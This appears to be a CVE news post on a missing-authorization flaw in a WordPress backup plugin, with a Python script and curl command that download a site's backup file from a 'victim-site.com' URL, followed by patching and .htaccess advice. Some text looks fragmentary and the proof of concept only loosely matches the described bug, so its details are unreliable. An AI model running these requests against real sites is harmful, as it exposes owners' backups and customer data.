CVE CyberSecurity Database News

CVE-2023-45636 - How Hackers Can Exploit a Missing Authorization Flaw in WebToffee WordPress Backup & Migration Plugin

Poster -

If you use the WebToffee WordPress Backup & Migration plugin to protect your site, pay attention: CVE-2023-45636 is a serious vulnerability that could let anyone access your website’s backups—no login required. In this exclusive deep-dive, we’ll break down how this bug works, show proof-of-concept code, and explain how attackers could steal or manipulate your vital data.

What is CVE-2023-45636?

CVE-2023-45636 is a Missing Authorization vulnerability affecting the WebToffee WordPress Backup & Migration plugin (all versions through 1.4.1). In simple words, the plugin doesn’t properly verify if the person requesting to access its sensitive features (like backups) is actually allowed to do so.

If a website hasn’t patched or updated this plugin, anyone on the internet might download, delete, or even replace site backups—no password or login required.

Technical Details: Why Did This Happen?

The plugin contains several admin-ajax.php endpoints to handle backup and migration tasks. However, it fails to correctly check the user's permission level (such as “administrator” or any logged-in user) before performing sensitive operations. This is a classic case of incorrectly configured access control.

*An endpoint should always check if a user is authorized. In this case, those checks are missing or improperly implemented.*


## Proof of Concept / Exploit Code

Attackers can exploit this using a simple HTTP POST or GET request, sometimes even from their own browser. Here’s a basic Python example to fetch a backup file directly:

import requests

target = "http://victim-site.com";
# Common default folder for backup files; may differ per setup
backup_file = "wp-content/backup-migration/backups/website-backup.zip"

url = f"{target}/{backup_file}"

response = requests.get(url)
if response.status_code == 200:
    with open("website-backup.zip", "wb") as f:
        f.write(response.content)
    print("Backup downloaded successfully!")
else:
    print("Failed to download backup. Response code:", response.status_code)

Or, using curl from the command line (replace target with your victim)

curl -O http://victim-site.com/wp-content/backup-migration/backups/website-backup.zip

*Note: The exact path may change depending on plugin settings and server structure.*

Potentially customer or client data

Worse, they might also upload manipulated backups to restore, giving them code execution control or a backdoor on your site.

Versions Affected

- WebToffee WordPress Backup & Migration from n/a through 1.4.1

How to Protect Your Site

1. Update your plugin immediately! Get the latest version from here.

If you can’t update, disable the plugin until a patch is available.

3. Restrict access to the /wp-content/backup-migration/backups/ directory using .htaccess or server config.

Sample .htaccess for Apache

<Directory "/var/www/html/wp-content/backup-migration/backups">
    Require all denied
</Directory>

References and Further Reading

- WordPress Plugin: Backup & Migration by WebToffee
- NVD - CVE-2023-45636
- Patchstack Advisory
- OWASP - Broken Access Control

Final Words

CVE-2023-45636 shows how a simple security misstep—missing an authorization check—can hand hackers the keys to your kingdom. If you manage WordPress sites, move fast: patch early, patch often, and keep your backups (and your admin panels) safe from prying eyes.

Timeline

Published on: 01/02/2025 12:15:09 UTC